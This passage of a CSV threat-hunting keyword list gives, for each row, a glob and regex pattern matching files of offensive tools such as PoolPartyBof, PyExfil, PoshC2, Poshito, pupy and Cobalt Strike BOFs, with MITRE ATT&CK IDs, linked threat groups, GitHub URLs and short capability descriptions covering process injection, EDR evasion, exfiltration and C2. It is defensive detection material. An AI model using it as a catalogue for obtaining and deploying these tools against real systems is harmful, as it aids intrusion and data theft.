set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","N/A","9","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","9732" "*/PoolPartyBof.git*",".{0,1000}\/PoolPartyBof\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","N/A","9","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","9733" 
"*/PoolPartyBof.git*",".{0,1000}\/PoolPartyBof\.git.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","1","N/A","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","9734" "*/PoolPartyBof.x64.o*",".{0,1000}\/PoolPartyBof\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","N/A","9","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","9735" "*/PoolPartyBof/releases/download/*",".{0,1000}\/PoolPartyBof\/releases\/download\/.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","1","N/A","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","9736" "*/PoolPartyBof/tarball/*",".{0,1000}\/PoolPartyBof\/tarball\/.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file 
implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","1","N/A","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","9737" "*/PoolPartyBof/zipball/*",".{0,1000}\/PoolPartyBof\/zipball\/.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","1","N/A","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","9738" "*/pop_exfil_client.py*",".{0,1000}\/pop_exfil_client\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","9739" "*/pop_exfil_server.py*",".{0,1000}\/pop_exfil_server\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","9740" "*/pop3-brute.nse*",".{0,1000}\/pop3\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9741" "*/pop3-capabilities.nse*",".{0,1000}\/pop3\-capabilities\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9742" "*/pop3-ntlm-info.nse*",".{0,1000}\/pop3\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9743" "*/popCalc.bin*",".{0,1000}\/popCalc\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. 
and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/spawn","1","1","N/A","N/A","10","10","455","73","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z","9744" "*/port_reuse.py*",".{0,1000}\/port_reuse\.py.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","1","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","9745" "*/port_scan.py*",".{0,1000}\/port_scan\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation 
framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","9746" "*/PortBender/*",".{0,1000}\/PortBender\/.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - 
LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","N/A","10","10","712","111","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z","9747" "*/portscan.cna*",".{0,1000}\/portscan\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","N/A","10","10","635","57","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z","9760" "*/Portscan.exe*",".{0,1000}\/Portscan\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","9761" "*/Portscan.exe*",".{0,1000}\/Portscan\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","9762" "*/portscan.git*",".{0,1000}\/portscan\.git.{0,1000}","offensive_tool_keyword","portscan","A simple TCP and UDP portscanner written in Go","T1595 - T1596 - T1594","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/zs5460/portscan","1","1","N/A","N/A","N/A","1","14","4","2022-11-11T09:26:47Z","2019-06-04T09:00:00Z","9763" "*/Port-Scan.ps1*",".{0,1000}\/Port\-Scan\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","9764" "*/portscan.yaml*",".{0,1000}\/portscan\.yaml.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation 
tool","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","N/A","10","5566","907","2025-04-22T14:57:07Z","2018-11-10T04:17:18Z","9765" "*/portscan/releases/*",".{0,1000}\/portscan\/releases\/.{0,1000}","offensive_tool_keyword","portscan","A simple TCP and UDP portscanner written in Go","T1595 - T1596 - T1594","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/zs5460/portscan","1","1","N/A","N/A","N/A","1","14","4","2022-11-11T09:26:47Z","2019-06-04T09:00:00Z","9766" "*/PortScanner.ahk*",".{0,1000}\/PortScanner\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","9767" "*/port-scan-tcp.ps1*",".{0,1000}\/port\-scan\-tcp\.ps1.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Discovery","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","1","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","9768" "*/port-scan-udp.ps1*",".{0,1000}\/port\-scan\-udp\.ps1.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Discovery","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","1","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","9769" 
"*/port-states.nse*",".{0,1000}\/port\-states\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9770" "*/POSeidon.profile*",".{0,1000}\/POSeidon\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - 
XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","9771" "*/posh.key*",".{0,1000}\/posh\.key.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","9772" "*/posh.tpl*",".{0,1000}\/posh\.tpl.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controller running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","9773" "*/PoshADCS.git*",".{0,1000}\/PoshADCS\.git.{0,1000}","offensive_tool_keyword","PoshADCS","attack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)","T1213.003 - T1213 - T1098.003 - T1098 - T1484.001","TA0002 - TA0003 - 
TA0040","N/A","N/A","Persistence","https://github.com/cfalta/PoshADCS","1","1","N/A","N/A","7","2","186","17","2021-07-07T16:47:07Z","2019-10-15T15:54:03Z","9774" "*/PoshC2*",".{0,1000}\/PoshC2.{0,1000}","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and Lateral Movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","9775" "*/poshc2-*",".{0,1000}\/poshc2\-.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - 
TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","9776" "*/PoshC2/*",".{0,1000}\/PoshC2\/.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","9777" "*/posh-config*",".{0,1000}\/posh\-config.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","9778" "*/Poshito -w /Poshito/Poshito 
poshito*",".{0,1000}\/Poshito\s\-w\s\/Poshito\/Poshito\sposhito.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","0","N/A","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","9779" "*/Poshito.dll*",".{0,1000}\/Poshito\.dll.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","1","N/A","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","9780" "*/Poshito.exe*",".{0,1000}\/Poshito\.exe.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","1","N/A","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","9781" "*/Poshito.git*",".{0,1000}\/Poshito\.git.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","1","N/A","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","9782" "*/Poshito/Poshito/Agent*",".{0,1000}\/Poshito\/Poshito\/Agent.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","0","#linux","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","9783" "*/posh-log*",".{0,1000}\/posh\-log.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - 
